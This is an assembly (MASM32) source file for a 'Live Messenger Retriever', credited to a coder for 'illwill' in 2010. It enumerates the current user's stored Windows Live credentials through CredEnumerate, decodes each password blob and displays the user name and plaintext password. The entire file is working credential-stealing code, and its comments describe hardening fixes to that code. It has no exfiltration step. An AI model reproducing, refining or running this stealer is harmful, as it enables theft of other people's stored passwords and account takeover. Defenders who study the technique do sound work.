; Credential Enumerator for Windows Live Messenger
; Based on many examples on the internet
; Coded for illwill by Matt (April 11, 2010)
; [edi+24] = BlobSize
; [edi+28] = BlobData
; [edi+48] = UserName
.586
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
include \masm32\include\advapi32.inc
include \masm32\include\crypt32.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\advapi32.lib
includelib \masm32\lib\crypt32.lib
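.data
; UI strings and the target-name filter handed to CredEnumerate.
szTitle     db "Live Messenger Retriever", 0
szErr       db "Error enumerating credentials", 0
szCredLive  db "WindowsLive:name=*", 0
szResultFmt db "Username: %s", 13, 10,"Password: %s", 0

.data?
dwCount     dd ?                    ; number of entries CredEnumerate returned
ccCreds     dd ?                    ; pointer to the returned array of credential pointers
; wsprintf does no bounds checking, so szResult has to hold the fixed text of
; szResultFmt (22 characters) plus a full szUser and szPass (63 characters
; each) and the terminating NUL. The previous 128 bytes were too small for that.
szResult    db 256 dup(?)
szUser      db 64 dup(?)
szPass      db 64 dup(?)

.code
;-----------------------------------------------------------------------
; start - program entry point (32-bit, stdcall, MASM32)
;
; Enumerates the calling user's stored credentials whose target name
; matches szCredLive and shows each user name / password pair in a
; message box. The blob at [edi+28] is read as-is: no decryption step
; runs in this process, so the stored secret is available to any code
; running as the same user that makes this call.
;
; Register roles inside the loop:
;   esi = cursor into the array of credential pointers
;   edi = current credential record
;   ebx = entries still to process (survives the API calls)
;
; Fixes over the earlier version:
;   - user name copy is bounded to szUser (was an unbounded lstrcpy)
;   - WideCharToMultiByte gets a character count, clamped to szPass
;     (was given the blob size in bytes, reading past the blob and
;     letting the terminator write land outside szPass)
;   - CredFree receives the buffer pointer, not the address of the
;     variable holding it, and is skipped when enumeration failed
;-----------------------------------------------------------------------
start:
    invoke  CredEnumerate, addr szCredLive, 0, addr dwCount, addr ccCreds
    test    eax, eax                ; 0 = enumeration failed
    jz      enum_failed

    mov     esi, ccCreds            ; esi -> first credential pointer
    mov     ebx, dwCount            ; ebx = entries left
    test    ebx, ebx
    jz      release                 ; nothing to show, but still free the buffer

next_cred:
    mov     edi, [esi]              ; edi -> current credential record

    ; Start every entry from zeroed buffers so each string is NUL-terminated
    ; even when a copy below is truncated or skipped.
    invoke  RtlZeroMemory, addr szUser, sizeof szUser
    invoke  RtlZeroMemory, addr szPass, sizeof szPass
    invoke  RtlZeroMemory, addr szResult, sizeof szResult

    mov     eax, [edi+48]           ; UserName pointer
    test    eax, eax
    jz      convert_blob            ; no user name stored: leave szUser empty
    invoke  lstrcpyn, addr szUser, eax, sizeof szUser   ; bounded copy, always terminated

convert_blob:
    mov     ecx, [edi+24]           ; BlobSize is in bytes
    shr     ecx, 1                  ; -> UTF-16 code units
    cmp     ecx, (sizeof szPass) - 1
    jbe     count_ok
    mov     ecx, (sizeof szPass) - 1 ; clamp so the output cannot fill the last byte
count_ok:
    test    ecx, ecx
    jz      show_result             ; empty blob: leave szPass empty
    ; Output is capped one byte short of the buffer; the zeroed tail is the terminator.
    invoke  WideCharToMultiByte, CP_ACP, 0, [edi+28], ecx, addr szPass, (sizeof szPass) - 1, 0, 0

show_result:
    invoke  wsprintf, addr szResult, addr szResultFmt, addr szUser, addr szPass
    invoke  MessageBox, 0, addr szResult, addr szTitle, MB_ICONINFORMATION

    add     esi, 4                  ; advance to the next credential pointer
    dec     ebx
    jnz     next_cred

release:
    invoke  CredFree, ccCreds       ; free the buffer CredEnumerate allocated
    jmp     finish

enum_failed:
    invoke  MessageBox, 0, addr szErr, addr szTitle, MB_ICONSTOP

finish:
    invoke  ExitProcess, 0
end start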